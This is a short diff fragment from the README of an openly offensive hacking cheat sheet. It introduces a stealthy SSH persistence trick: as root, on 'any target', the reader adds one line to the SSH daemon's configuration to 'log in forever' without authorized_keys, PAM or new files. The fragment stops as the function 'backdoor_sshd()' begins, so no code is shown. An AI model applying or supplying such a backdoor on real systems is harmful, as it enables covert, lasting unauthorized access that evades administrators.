hackerschoice/thc-tips-tricks-hacks-cheat-sheet/README.md

 - Does not create any new file.
 - Does not use `authorized_keys` or PAM.

 Adding your key to *authorized_keys* is overused 😩.
-Instead, cut & paste this (as root):
+Instead, as root, cut & paste this _once_ on any target.
+It will add a single line to SSHD's config and allow you to log in forever:

 ```shell
 backdoor_sshd() {